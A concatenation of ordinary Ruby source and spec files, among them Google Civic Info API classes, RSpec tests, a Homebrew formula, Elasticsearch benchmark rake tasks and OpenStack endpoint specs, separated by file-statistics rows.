# @return [String]
attr_accessor :line1
# The second line the address, if needed.
# Corresponds to the JSON property `line2`
# @return [String]
attr_accessor :line2
# The third line of the address, if needed.
# Corresponds to the JSON property `line3`
# @return [String]
attr_accessor :line3
# The name of the location.
# Corresponds to the JSON property `locationName`
# @return [String]
attr_accessor :location_name
# The US two letter state abbreviation of the address.
# Corresponds to the JSON property `state`
# @return [String]
attr_accessor :state
# The US Postal Zip Code of the address.
# Corresponds to the JSON property `zip`
# @return [String]
attr_accessor :zip
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@city = args[:city] if args.key?(:city)
@line1 = args[:line1] if args.key?(:line1)
@line2 = args[:line2] if args.key?(:line2)
@line3 = args[:line3] if args.key?(:line3)
@location_name = args[:location_name] if args.key?(:location_name)
@state = args[:state] if args.key?(:state)
@zip = args[:zip] if args.key?(:zip)
end
end
# Contains information about the data source for the element containing it.
class Source
include Google::Apis::Core::Hashable
# The name of the data source.
# Corresponds to the JSON property `name`
# @return [String]
attr_accessor :name
# Whether this data comes from an official government source.
# Corresponds to the JSON property `official`
# @return [Boolean]
attr_accessor :official
alias_method :official?, :official
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@name = args[:name] if args.key?(:name)
@official = args[:official] if args.key?(:official)
end
end
# A request for information about a voter.
class VoterInfoRequest
include Google::Apis::Core::Hashable
#
# Corresponds to the JSON property `contextParams`
# @return [Google::Apis::CivicinfoV2::ContextParams]
attr_accessor :context_params
#
# Corresponds to the JSON property `voterInfoSegmentResult`
# @return [Google::Apis::CivicinfoV2::VoterInfoSegmentResult]
attr_accessor :voter_info_segment_result
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@context_params = args[:context_params] if args.key?(:context_params)
@voter_info_segment_result = args[:voter_info_segment_result] if args.key?(:voter_info_segment_result)
end
end
# The result of a voter info lookup query.
class VoterInfoResponse
include Google::Apis::Core::Hashable
# Contests that will appear on the voter's ballot.
# Corresponds to the JSON property `contests`
# @return [Array<Google::Apis::CivicinfoV2::Contest>]
attr_accessor :contests
# Locations where a voter is eligible to drop off a completed ballot. The voter
# must have received and completed a ballot prior to arriving at the location.
# The location may not have ballots available on the premises. These locations
# could be open on or before election day as indicated in the pollingHours field.
# Corresponds to the JSON property `dropOffLocations`
# @return [Array<Google::Apis::CivicinfoV2::PollingLocation>]
attr_accessor :drop_off_locations
# Locations where the voter is eligible to vote early, prior to election day.
# Corresponds to the JSON property `earlyVoteSites`
# @return [Array<Google::Apis::CivicinfoV2::PollingLocation>]
attr_accessor :early_vote_sites
# Information about the election that was queried.
# Corresponds to the JSON property `election`
# @return [Google::Apis::CivicinfoV2::Election]
attr_accessor :election
# Identifies what kind of resource this is. Value: the fixed string "civicinfo#
# voterInfoResponse".
# Corresponds to the JSON property `kind`
# @return [String]
attr_accessor :kind
# Specifies whether voters in the precinct vote only by mailing their ballots (
# with the possible option of dropping off their ballots as well).
# Corresponds to the JSON property `mailOnly`
# @return [Boolean]
attr_accessor :mail_only
alias_method :mail_only?, :mail_only
# A simple representation of an address.
# Corresponds to the JSON property `normalizedInput`
# @return [Google::Apis::CivicinfoV2::SimpleAddressType]
attr_accessor :normalized_input
# If no election ID was specified in the query, and there was more than one
# election with data for the given voter, this will contain information about
# the other elections that could apply.
# Corresponds to the JSON property `otherElections`
# @return [Array<Google::Apis::CivicinfoV2::Election>]
attr_accessor :other_elections
# Locations where the voter is eligible to vote on election day.
# Corresponds to the JSON property `pollingLocations`
# @return [Array<Google::Apis::CivicinfoV2::PollingLocation>]
attr_accessor :polling_locations
#
# Corresponds to the JSON property `precinctId`
# @return [String]
attr_accessor :precinct_id
# Local Election Information for the state that the voter votes in. For the US,
# there will only be one element in this array.
# Corresponds to the JSON property `state`
# @return [Array<Google::Apis::CivicinfoV2::AdministrationRegion>]
attr_accessor :state
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@contests = args[:contests] if args.key?(:contests)
@drop_off_locations = args[:drop_off_locations] if args.key?(:drop_off_locations)
@early_vote_sites = args[:early_vote_sites] if args.key?(:early_vote_sites)
@election = args[:election] if args.key?(:election)
@kind = args[:kind] if args.key?(:kind)
@mail_only = args[:mail_only] if args.key?(:mail_only)
@normalized_input = args[:normalized_input] if args.key?(:normalized_input)
@other_elections = args[:other_elections] if args.key?(:other_elections)
@polling_locations = args[:polling_locations] if args.key?(:polling_locations)
@precinct_id = args[:precinct_id] if args.key?(:precinct_id)
@state = args[:state] if args.key?(:state)
end
end
#
class VoterInfoSegmentResult
include Google::Apis::Core::Hashable
#
# Corresponds to the JSON property `generatedMillis`
# @return [String]
attr_accessor :generated_millis
#
# Corresponds to the JSON property `postalAddress`
# @return [Google::Apis::CivicinfoV2::PostalAddress]
attr_accessor :postal_address
# A request for information about a voter.
# Corresponds to the JSON property `request`
# @return [Google::Apis::CivicinfoV2::VoterInfoRequest]
attr_accessor :request
# The result of a voter info lookup query.
# Corresponds to the JSON property `response`
# @return [Google::Apis::CivicinfoV2::VoterInfoResponse]
attr_accessor :response
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@generated_millis = args[:generated_millis] if args.key?(:generated_millis)
@postal_address = args[:postal_address] if args.key?(:postal_address)
@request = args[:request] if args.key?(:request)
@response = args[:response] if args.key?(:response)
end
end
end
end
end
| 40.702667 | 151 | 0.630311 |
7aa202875793a1cbdc105b704c6b66cac4236371 | 882 | require 'spec_helper'
describe Gitlab::FileResponse do
before do
@file_response = described_class.new StringIO.new('', 'rb+')
end
context '.empty?' do
it 'returns false' do
expect(@file_response.empty?).to be false
end
end
context '.to_hash' do
it 'has `filename` key and `data` key' do
h = @file_response.to_hash
expect(h).to be_key(:filename)
expect(h).to be_key(:data)
end
end
context '.parse_headers!' do
it 'parses headers' do
@file_response.parse_headers!('Content-Disposition' => 'attachment; filename=artifacts.zip')
expect(@file_response.filename).to eq 'artifacts.zip'
end
it 'handles quoted filenames' do
@file_response.parse_headers!('Content-Disposition' => 'attachment; filename="artifacts.zip"')
expect(@file_response.filename).to eq 'artifacts.zip'
end
end
end
| 25.941176 | 100 | 0.673469 |
035a0edbf7dac24eb74abbc0d336bf84c361e8d6 | 455 | # frozen_string_literal: true
module Orchestration
module Services
module Database
module Adapters
class Sqlite3
def name
'sqlite3'
end
def credentials
{
'username' => '',
'password' => '',
'database' => 'healthcheck'
}
end
def errors
[]
end
end
end
end
end
end
| 16.25 | 41 | 0.426374 |
01c6a55f243d8bec43d7e2c6e51038d00712e165 | 124 | require 'test_helper'
class BakerMailerTest < ActionMailer::TestCase
# test "the truth" do
# assert true
# end
end
| 15.5 | 46 | 0.709677 |
261ddc7a39784ecf6b3aa4a736c8056a570f96ee | 339 | class PartitionWorld < Partition
class PartitionTree < Tree
def init(partition, item)
super()
@universeSize = partition.universeSize
@partition = partition
@item = item
@parent = nil
@rank = 0
@count = 1
end
attr_reader :partition
attr_accessor :parent
attr_accessor :rank
attr_accessor :count
end
end
| 18.833333 | 41 | 0.699115 |
1d9669b7818a8d26c716e725381dc88a29eb0a6c | 912 | class User < ApplicationRecord
has_secure_password
has_secure_token :session_token
before_save :downcase_email
has_many :food_pantries
validates :email, format: {with: URI::MailTo::EMAIL_REGEXP}, presence: true, uniqueness: true
def self.authenticate_by(attributes)
passwords, identifiers = attributes.to_h.partition do |name, value|
!has_attribute?(name) && has_attribute?("#{name}_digest")
end.map(&:to_h)
raise ArgumentError, "One or more password arguments are required" if passwords.empty?
raise ArgumentError, "One or more finder arguments are required" if identifiers.empty?
if (record = find_by(identifiers))
record if passwords.count { |name, value| record.public_send(:"authenticate_#{name}", value) } == passwords.size
else
new(passwords)
nil
end
end
private
def downcase_email
self.email = email.downcase
end
end
| 28.5 | 118 | 0.719298 |
bbf2de6bbf13ce6338fbdc796b9cd45cedf6e310 | 2,308 | require File.expand_path('../../../spec_helper', __FILE__)
require File.expand_path('../../../shared/enumerator/with_index', __FILE__)
require File.expand_path('../../enumerable/shared/enumeratorized', __FILE__)
describe "Enumerator#with_index" do
it_behaves_like(:enum_with_index, :with_index)
it_behaves_like(:enumeratorized_with_origin_size, :with_index, [1,2,3].select)
it "returns a new Enumerator when no block is given" do
enum1 = [1,2,3].select
enum2 = enum1.with_index
enum2.should be_an_instance_of(enumerator_class)
enum1.should_not === enum2
end
it "accepts an optional argument when given a block" do
lambda do
@enum.with_index(1) { |f| f}
end.should_not raise_error(ArgumentError)
end
it "accepts an optional argument when not given a block" do
lambda do
@enum.with_index(1)
end.should_not raise_error(ArgumentError)
end
it "numbers indices from the given index when given an offset but no block" do
@enum.with_index(1).to_a.should == [[1,1], [2,2], [3,3], [4,4]]
end
it "numbers indices from the given index when given an offset and block" do
acc = []
@enum.with_index(1) {|e,i| acc << [e,i] }
acc.should == [[1,1], [2,2], [3,3], [4,4]]
end
it "raises a TypeError when the argument cannot be converted to numeric" do
lambda do
@enum.with_index('1') {|*i| i}
end.should raise_error(TypeError)
end
it "converts non-numeric arguments to Integer via #to_int" do
(o = mock('1')).should_receive(:to_int).and_return(1)
@enum.with_index(o).to_a.should == [[1,1], [2,2], [3,3], [4,4]]
end
it "coerces the given numeric argument to an Integer" do
@enum.with_index(1.678).to_a.should == [[1,1], [2,2], [3,3], [4,4]]
res = []
@enum.with_index(1.001) { |*x| res << x}
res.should == [[1,1], [2,2], [3,3], [4,4]]
end
it "treats nil argument as no argument" do
@enum.with_index(nil).to_a.should == [[1,0], [2,1], [3,2], [4,3]]
res = []
@enum.with_index(nil) { |*x| res << x}
res.should == [[1,0], [2,1], [3,2], [4,3]]
end
it "accepts negative argument" do
@enum.with_index(-1).to_a.should == [[1,-1], [2,0], [3,1], [4,2]]
res = []
@enum.with_index(-1) { |*x| res << x}
res.should == [[1,-1], [2,0], [3,1], [4,2]]
end
end
| 31.616438 | 80 | 0.62565 |
b9c5217f9e4927985d83f3f9944d3a0f309892b3 | 305 | $LOAD_PATH.unshift(File.join(File.dirname(__FILE__)))
require 'net/http'
require 'slack-ruby-bot'
require 'socket'
require 'yaml'
require 'slackerbutler/version'
require 'slackerbutler/commands'
require 'slackerbutler/butler'
require 'slackerbutler/bot'
require 'slackerbutler/help'
SlackerButler.run!
| 20.333333 | 53 | 0.8 |
1aac0b1e33e9f06862221e4ee694d836827b0aba | 2,243 | # coding: UTF-8
require_relative '../spec_helper'
describe 'cerner_splunk::heavy_forwarder' do
subject do
runner = ChefSpec::SoloRunner.new(platform: 'centos', version: '6.8') do |node|
node.override['splunk']['config']['clusters'] = ['cerner_splunk/cluster']
node.run_state['cerner_splunk'] = {}
node.run_state['cerner_splunk']['splunk_forwarder_migrate'] = splunk_installed
end
runner.converge(described_recipe)
end
let(:cluster_config) do
{
'receivers' => ['33.33.33.20'],
'license_uri' => nil,
'receiver_settings' => {
'splunktcp' => {
'port' => '9997'
}
},
'indexes' => 'cerner_splunk/indexes'
}
end
let(:splunk_installed) { nil }
before do
allow(ChefVault::Item).to receive(:data_bag_item_type).and_return(:normal)
stub_data_bag_item('cerner_splunk', 'cluster').and_return(cluster_config)
stub_data_bag_item('cerner_splunk', 'indexes').and_return({})
allow(Dir).to receive(:exist?).and_call_original
allow(Dir).to receive(:exist?).with('/opt/splunkforwarder').and_return(splunk_installed)
end
after do
CernerSplunk.reset
end
context 'when splunkforwarder is installed' do
let(:splunk_installed) { true }
it 'includes cerner_splunk::_migrate_forwarder recipe' do
expect(subject).to include_recipe('cerner_splunk::_migrate_forwarder')
end
it 'runs initialize-splunk-backup-artifacts ruby block' do
expect(subject).to run_ruby_block('initialize-splunk-backup-artifacts')
end
end
context 'when splunkforwarder is not installed' do
let(:splunk_installed) { false }
it 'does not include cerner_splunk::_migrate_forwarder recipe' do
expect(subject).not_to include_recipe('cerner_splunk::_migrate_forwarder')
end
it 'does not run initialize-splunk-backup-artifacts ruby block' do
expect(subject).not_to run_ruby_block('initialize-splunk-backup-artifacts')
end
end
it 'includes default cerner_splunk::_install recipe' do
expect(subject).to include_recipe('cerner_splunk::_install')
end
it 'includes default cerner_splunk::_start recipe' do
expect(subject).to include_recipe('cerner_splunk::_start')
end
end
| 29.906667 | 92 | 0.700401 |
919ef6d71a45349343cbc79230dbc0371ea64b21 | 3,097 | require 'spec_helper'
module RailsParamValidation
RSpec.describe ObjectValidator do
before(:all) do
@validator = ValidatorFactory.create({ name: String, amount: Float })
end
it 'should accept valid hashes' do
match = @validator.matches?([], name: "John Doe", amount: 42.0)
expect(match.matches?).to eq(true)
expect(match.value).to eq(name: "John Doe", amount: 42.0)
end
it 'should reject hashes with missing keys' do
match = @validator.matches?([], name: "John Doe")
expect(match.matches?).to eq(false)
expect(match.value).to eq(nil)
expect(match.errors).to eq([{ path: [:amount], message: "Expected a float" }])
end
it 'should reject hashes with additional keys' do
match = @validator.matches?([], name: "John Doe", amount: 42.0, age: 23)
expect(match.matches?).to eq(false)
expect(match.value).to eq(nil)
expect(match.errors).to eq([{ path: [:age], message: "Unknown property" }])
end
it 'should return symbols as keys if schema defines symbols if strings are given' do
match = @validator.matches?([], "name" => "John Doe", "amount" => 42.0)
expect(match.errors).to eq([])
expect(match.matches?).to eq(true)
expect(match.value).to eq({ name: "John Doe", amount: 42.0 })
end
it 'should return symbols as keys if schema defines symbols if symbols are given' do
match = @validator.matches?([], name: "John Doe", amount: 42.0)
expect(match.errors).to eq([])
expect(match.matches?).to eq(true)
expect(match.value).to eq({ name: "John Doe", amount: 42.0 })
end
it 'should return strings as keys if schema defines strings if strings are given' do
@validator = ValidatorFactory.create({ "name" => String, "amount" => Float })
match = @validator.matches?([], "name" => "John Doe", "amount" => 42.0)
expect(match.errors).to eq([])
expect(match.matches?).to eq(true)
expect(match.value).to eq({ "name" => "John Doe", "amount" => 42.0 })
end
it 'should return strings as keys if schema defines strings if symbols are given' do
@validator = ValidatorFactory.create({ "name" => String, "amount" => Float })
match = @validator.matches?([], name: "John Doe", amount: 42.0)
expect(match.errors).to eq([])
expect(match.matches?).to eq(true)
expect(match.value).to eq({ "name" => "John Doe", "amount" => 42.0 })
end
it 'should not accept strings' do
match = @validator.matches?([], "John Doe")
expect(match.matches?).to eq(false)
expect(match.errors).to eq([{ path: [], message: "Expected an object" }])
expect(match.value).to eq(nil)
end
it 'should not accept arrays' do
match = @validator.matches?([], [])
expect(match.matches?).to eq(false)
expect(match.errors).to eq([{ path: [], message: "Expected an object" }])
expect(match.value).to eq(nil)
end
it 'should not accept floats' do
match = @validator.matches?([], 42.5)
expect(match.matches?).to eq(false)
expect(match.errors).to eq([{ path: [], message: "Expected an object" }])
expect(match.value).to eq(nil)
end
end
end | 32.6 | 86 | 0.64514 |
034b706f34eb9ac020fe4ab994d02fe4c13d033f | 1,011 | {
matrix_id: '105',
name: 'can_715',
group: 'HB',
description: 'SYMMETRIC PATTERN FROM CANNES,LUCIEN MARRO,JUNE 1981.',
author: 'L. Marro',
editor: 'I. Duff, R. Grimes, J. Lewis',
date: '1981',
kind: 'structural problem',
problem_2D_or_3D: '1',
num_rows: '715',
num_cols: '715',
nonzeros: '6665',
num_explicit_zeros: '0',
num_strongly_connected_components: '1',
num_dmperm_blocks: '1',
structural_full_rank: 'true',
structural_rank: '715',
pattern_symmetry: '1.000',
numeric_symmetry: '1.000',
rb_type: 'binary',
structure: 'symmetric',
cholesky_candidate: 'yes',
positive_definite: 'no',
norm: '1.531015e+01',
min_singular_value: '1.287771e-17',
condition_number: '1188887424375131136',
svd_rank: '702',
sprank_minus_rank: '13',
null_space_dimension: '13',
full_numerical_rank: 'no',
svd_gap: '3472187067432.159668',
image_files: 'can_715.png,can_715_svd.png,can_715_graph.gif,',
}
| 28.885714 | 73 | 0.645895 |
bbcec9abe52ee3edce7abdb7d65354b0c315c65f | 583 | class EnvkeyFetch < Formula
desc "Give it an ENVKEY, get back decrypted config as json"
homepage "https://www.envkey.com"
url "https://github.com/envkey/envkey-fetch/archive/v1.2.8.tar.gz"
sha256 "4d1f55ba8d1c024ddc49752979439d035beb890ddd1fe8b40805aa048c5a5bee"
depends_on "go" => :build
def install
ENV["GOPATH"] = buildpath/"src"
ENV["GO111MODULE"] = "on"
system "go", "build", "-o", "envkey-fetch", "main.go"
bin.install "envkey-fetch"
end
test do
shell_output "#{bin}/envkey-fetch"
shell_output "#{bin}/envkey-fetch 000", 1
end
end
| 26.5 | 75 | 0.687822 |
1c6965105fe6ba7a503ea35d25e6e6cef165f1aa | 745 | # frozen_string_literal: true
require 'active_support'
require 'active_record'
require 'delayed_job'
require 'delayed_job_active_record'
require 'delayed/job_groups/compatibility'
require 'delayed/job_groups/job_extensions'
require 'delayed/job_groups/job_group'
require 'delayed/job_groups/plugin'
require 'delayed/job_groups/yaml_loader'
require 'delayed/job_groups/version'
if defined?(Delayed::Backend::ActiveRecord)
if defined?(Rails::Railtie)
# Postpone initialization to railtie for correct order
require 'delayed/job_groups/railtie'
else
# Do the same as in the railtie
Delayed::Backend::ActiveRecord::Job.include(Delayed::JobGroups::JobExtensions)
end
end
Delayed::Worker.plugins << Delayed::JobGroups::Plugin
| 28.653846 | 82 | 0.795973 |
5d28f822bd381b65f1828c9dc8682de192893473 | 1,388 | # -*- encoding: utf-8 -*-
# stub: jbuilder 2.4.1 ruby lib
Gem::Specification.new do |s|
s.name = "jbuilder".freeze
s.version = "2.4.1"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["David Heinemeier Hansson".freeze, "Pavel Pravosud".freeze]
s.date = "2016-02-09"
s.email = ["[email protected]".freeze, "[email protected]".freeze]
s.homepage = "https://github.com/rails/jbuilder".freeze
s.licenses = ["MIT".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 1.9.3".freeze)
s.rubygems_version = "2.6.8".freeze
s.summary = "Create JSON structures via a Builder-style DSL".freeze
s.installed_by_version = "2.6.8" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_runtime_dependency(%q<activesupport>.freeze, ["< 5.1", ">= 3.0.0"])
s.add_runtime_dependency(%q<multi_json>.freeze, ["~> 1.2"])
else
s.add_dependency(%q<activesupport>.freeze, ["< 5.1", ">= 3.0.0"])
s.add_dependency(%q<multi_json>.freeze, ["~> 1.2"])
end
else
s.add_dependency(%q<activesupport>.freeze, ["< 5.1", ">= 3.0.0"])
s.add_dependency(%q<multi_json>.freeze, ["~> 1.2"])
end
end
| 38.555556 | 112 | 0.663545 |
26a6e18a775053fe56c8ae4c382a9603a68da079 | 373 | require 'fileutils'
require 'pathname'
require 'fakefs/base'
require 'fakefs/fake/file'
require 'fakefs/fake/dir'
require 'fakefs/fake/inode'
require 'fakefs/fake/symlink'
require 'fakefs/file_system'
require 'fakefs/fileutils'
require 'fakefs/file'
require 'fakefs/file_test'
require 'fakefs/dir'
require 'fakefs/globber'
require 'fakefs/pathname'
require 'fakefs/kernel'
| 23.3125 | 29 | 0.793566 |
4a38cb9834e3048fa9a9c5ddae7117e5c1cb9ee8 | 6,851 | # Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
require_relative "../benchmarking"
namespace :benchmark do
namespace :simple do
desc "Run the \'ping\' benchmark test"
task :ping do
require 'elasticsearch'
Elasticsearch::Benchmarking.each_run(ENV['matrix']) do |run|
task = Elasticsearch::Benchmarking::Simple.new(run)
puts "#{'*' * 5} PING #{'*' * 5} \n"
puts "#{task.run(:ping)}"
end
end
desc "Run the \'create index\' benchmark test"
task :create_index do
require 'elasticsearch'
Elasticsearch::Benchmarking.each_run(ENV['matrix']) do |run|
task = Elasticsearch::Benchmarking::Simple.new(run)
puts "#{'*' * 5} CREATE INDEX #{'*' * 5} \n"
puts "#{task.run(:create_index)}"
end
end
desc "Run the \'index smal document\' benchmark test with patron adapter"
task :index_document_small_patron do
require 'elasticsearch'
Elasticsearch::Benchmarking.each_run(ENV['matrix']) do |run|
begin
require 'patron'
rescue LoadError
puts "Patron not loaded, skipping test"
else
task = Elasticsearch::Benchmarking::Simple.new(run, :patron)
puts "#{'*' * 5} INDEX SMALL DOCUMENT, PATRON #{'*' * 5} \n"
puts "#{task.run(:index_document_small)}"
end
end
end
desc "Run the \'index small document\' benchmark test"
task :index_document_small do
require 'elasticsearch'
Elasticsearch::Benchmarking.each_run(ENV['matrix']) do |run|
task = Elasticsearch::Benchmarking::Simple.new(run)
puts "#{'*' * 5} INDEX SMALL DOCUMENT #{'*' * 5} \n"
puts "#{task.run(:index_document_small)}"
end
end
desc "Run the \'index large document\' benchmark test"
task :index_document_large do
require 'elasticsearch'
Elasticsearch::Benchmarking.each_run(ENV['matrix']) do |run|
task = Elasticsearch::Benchmarking::Simple.new(run)
puts "#{'*' * 5} INDEX LARGE DOCUMENT #{'*' * 5} \n"
puts "#{task.run(:index_document_large)}"
end
end
desc "Run the \'get small document\' benchmark test"
task :get_document_small do
require 'elasticsearch'
Elasticsearch::Benchmarking.each_run(ENV['matrix']) do |run|
task = Elasticsearch::Benchmarking::Simple.new(run)
puts "#{'*' * 5} GET SMALL DOCUMENT #{'*' * 5} \n"
puts "#{task.run(:get_document_small)}"
end
end
desc "Run the \'get large document\' benchmark test"
task :get_document_large do
require 'elasticsearch'
Elasticsearch::Benchmarking.each_run(ENV['matrix']) do |run|
task = Elasticsearch::Benchmarking::Simple.new(run)
puts "#{'*' * 5} GET LARGE DOCUMENT #{'*' * 5} \n"
puts "#{task.run(:get_document_large)}"
end
end
desc "Run the \'search small document\' benchmark test"
task :search_document_small do
require 'elasticsearch'
Elasticsearch::Benchmarking.each_run(ENV['matrix']) do |run|
task = Elasticsearch::Benchmarking::Simple.new(run)
puts "#{'*' * 5} SEARCH SMALL DOCUMENT #{'*' * 5} \n"
puts "#{task.run(:search_document_small)}"
end
end
desc "Run the \'search small document\' benchmark test"
task :search_document_large do
require 'elasticsearch'
Elasticsearch::Benchmarking.each_run(ENV['matrix']) do |run|
task = Elasticsearch::Benchmarking::Simple.new(run)
puts "#{'*' * 5} SEARCH LARGE DOCUMENT #{'*' * 5} \n"
puts "#{task.run(:search_document_large)}"
end
end
desc "Run the \'update document\' benchmark test"
task :update_document do
require 'elasticsearch'
Elasticsearch::Benchmarking.each_run(ENV['matrix']) do |run|
task = Elasticsearch::Benchmarking::Simple.new(run)
puts "#{'*' * 5} UPDATE DOCUMENT #{'*' * 5} \n"
puts "#{task.run(:update_document)}"
end
end
desc "Run all simple benchmark tests"
task :all, [:matrix] do |t, args|
%w[ benchmark:simple:ping
benchmark:simple:create_index
benchmark:simple:index_document_small
benchmark:simple:index_document_small_patron
benchmark:simple:index_document_large
benchmark:simple:get_document_small
benchmark:simple:get_document_large
benchmark:simple:search_document_small
benchmark:simple:search_document_large
benchmark:simple:update_document
].each do |task_name|
begin
require 'elasticsearch'
Rake::Task[task_name].invoke(*args)
rescue => ex
puts "Error in task [#{task_name}], #{ex.inspect}"
next
end
end
end
# namespace :noop do
#
# desc "Run the \'search small document\' benchmark test with the noop plugin"
# task :search_document_small do
# puts "SIMPLE REQUEST BENCHMARK:: SEARCH SMALL DOCUMENT WITH NOOP PLUGIN"
# Elasticsearch::Benchmarking::Simple.new.run(:search_document_small, noop: true)
# end
# end
end
namespace :complex do
desc "Run the \'index documents\' benchmark test"
task :index_documents do
require 'elasticsearch'
Elasticsearch::Benchmarking.each_run(ENV['matrix']) do |run|
task = Elasticsearch::Benchmarking::Complex.new(run)
puts "#{'*' * 5} INDEX DOCUMENTS #{'*' * 5} \n"
puts "#{task.run(:index_documents)}"
end
end
desc "Run the \'search documents\' benchmark test"
task :search_documents do
require 'elasticsearch'
Elasticsearch::Benchmarking.each_run(ENV['matrix']) do |run|
task = Elasticsearch::Benchmarking::Complex.new(run)
puts "#{'*' * 5} SEARCH DOCUMENTS #{'*' * 5} \n"
puts "#{task.run(:search_documents)}"
end
end
desc "Run all complex benchmark test"
task :all do
%w[ benchmark:complex:index_documents
].each do |task_name|
require 'elasticsearch'
Rake::Task[task_name].invoke
end
end
end
end
| 35.133333 | 89 | 0.636695 |
87d9adade0409230b9767e9cfce5e1f783af7858 | 8,922 | # encoding: UTF-8
require_relative 'spec_helper'
require ::File.join ::File.dirname(__FILE__), '..', 'libraries', 'uri'
require ::File.join ::File.dirname(__FILE__), '..', 'libraries', 'endpoints'
describe 'openstack-common::default' do
describe 'Openstack endpoints' do
let(:runner) { ChefSpec::SoloRunner.new(CHEFSPEC_OPTS) }
let(:node) { runner.node }
let(:chef_run) { runner.converge(described_recipe) }
let(:subject) { Object.new.extend(Openstack) }
%w(public internal admin).each do |ep_type|
describe "#{ep_type}_endpoint" do
it 'fails with a NoMethodError when no openstack.endpoints in node attrs' do
allow(subject).to receive(:node).and_return({})
expect do
subject.send("#{ep_type}_endpoint", 'someservice')
end.to raise_error(NoMethodError)
end
it 'fails with a NoMethodError when no endpoint was found' do
allow(subject).to receive(:node).and_return(node)
expect do
subject.send("#{ep_type}_endpoint", 'someservice')
end.to raise_error(NoMethodError)
end
it 'handles a URI needing escaped' do
uri_hash = {
'openstack' => {
'endpoints' => {
ep_type => {
'compute-api' => {
'uri' => 'http://localhost:8080/v2/%(tenant_id)s',
},
},
},
},
}
allow(subject).to receive(:node).and_return(uri_hash)
expect(
subject.send("#{ep_type}_endpoint", 'compute-api').path
).to eq('/v2/%25(tenant_id)s')
end
it 'returns endpoint URI object when uri key in endpoint hash' do
uri_hash = {
'openstack' => {
'endpoints' => {
ep_type => {
'compute-api' => {
'uri' => 'http://localhost:1234/path',
},
},
},
},
}
allow(subject).to receive(:node).and_return(uri_hash)
expect(
subject.send("#{ep_type}_endpoint", 'compute-api').port
).to eq(1234)
end
it 'returns endpoint URI string when uri key in endpoint hash and host also in hash' do
uri_hash = {
'openstack' => {
'endpoints' => {
ep_type => {
'compute-api' => {
'uri' => 'http://localhost',
'host' => 'ignored',
},
},
},
},
}
allow(subject).to receive(:node).and_return(uri_hash)
expect(subject.send("#{ep_type}_endpoint", 'compute-api').to_s).to eq('http://localhost')
end
it 'returns endpoint URI object when uri key not in endpoint hash but host is in hash' do
expect(subject).to receive(:uri_from_hash).with('host' => 'localhost', 'port' => '1234')
uri_hash = {
'openstack' => {
'endpoints' => {
ep_type => {
'compute-api' => {
'host' => 'localhost',
'port' => '1234',
},
},
},
},
}
allow(subject).to receive(:node).and_return(uri_hash)
subject.send("#{ep_type}_endpoint", 'compute-api')
end
end
end
describe 'transport_url' do
it do
allow(subject).to receive(:node).and_return(chef_run.node)
allow(subject).to receive(:get_password)
.with('user', 'openstack')
.and_return('mypass')
expected = 'rabbit://openstack:[email protected]:5672/'
expect(subject.rabbit_transport_url('compute')).to eq(expected)
end
it do
node.set['openstack']['mq']['service_type'] = 'rabbit'
node.set['openstack']['mq']['cluster'] = true
node.set['openstack']['mq']['compute']['rabbit']['userid'] = 'rabbit2'
node.set['openstack']['endpoints']['mq']['port'] = 1234
node.set['openstack']['mq']['servers'] = %w(10.0.0.1 10.0.0.2 10.0.0.3)
node.set['openstack']['mq']['vhost'] = '/anyhost'
allow(subject).to receive(:node).and_return(chef_run.node)
allow(subject).to receive(:get_password)
.with('user', 'rabbit2')
.and_return('mypass2')
expected = 'rabbit://rabbit2:[email protected]:1234,rabbit2:[email protected]:1234,rabbit2:[email protected]:1234/anyhost'
expect(subject.rabbit_transport_url('compute')).to eq(expected)
end
end
describe '#db' do
it 'returns nil when no openstack.db not in node attrs' do
allow(subject).to receive(:node).and_return({})
expect(subject.db('nonexisting')).to be_nil
end
it 'returns nil when no such service was found' do
allow(subject).to receive(:node).and_return(chef_run.node)
expect(subject.db('nonexisting')).to be_nil
end
it 'returns db info hash when service found' do
allow(subject).to receive(:node).and_return(chef_run.node)
expect(subject.db('compute')['host']).to eq('127.0.0.1')
expect(subject.db('compute').key?('uri')).to be_falsey
end
end
describe '#db_uri' do
it 'returns nil when no openstack.db not in node attrs' do
allow(subject).to receive(:node).and_return({})
expect(subject.db_uri('nonexisting', 'user', 'pass')).to be_nil
end
it 'returns nil when no such service was found' do
allow(subject).to receive(:node).and_return(chef_run.node)
expect(
subject.db_uri('nonexisting', 'user', 'pass')
).to be_nil
end
it 'returns compute db info hash when service found for default mysql' do
allow(subject).to receive(:node).and_return(chef_run.node)
expected = 'mysql+pymysql://user:[email protected]:3306/nova?charset=utf8'
expect(
subject.db_uri('compute', 'user', 'pass')
).to eq(expected)
end
it 'returns network db info hash when service found for sqlite with options' do
node.set['openstack']['db']['service_type'] = 'sqlite'
node.set['openstack']['db']['options'] = { 'sqlite' => '?options' }
node.set['openstack']['db']['network']['path'] = 'path'
allow(subject).to receive(:node).and_return(chef_run.node)
expected = 'sqlite:///path?options'
expect(
subject.db_uri('network', 'user', 'pass')
).to eq(expected)
end
it 'returns compute db info hash when service found for mariadb' do
node.set['openstack']['db']['service_type'] = 'mariadb'
allow(subject).to receive(:node).and_return(chef_run.node)
expected = 'mysql+pymysql://user:[email protected]:3306/nova?charset=utf8'
expect(
subject.db_uri('compute', 'user', 'pass')
).to eq(expected)
end
%w(galera percona-cluster).each do |db|
it "returns compute db info hash when service found for #{db}" do
node.set['openstack']['db']['service_type'] = db
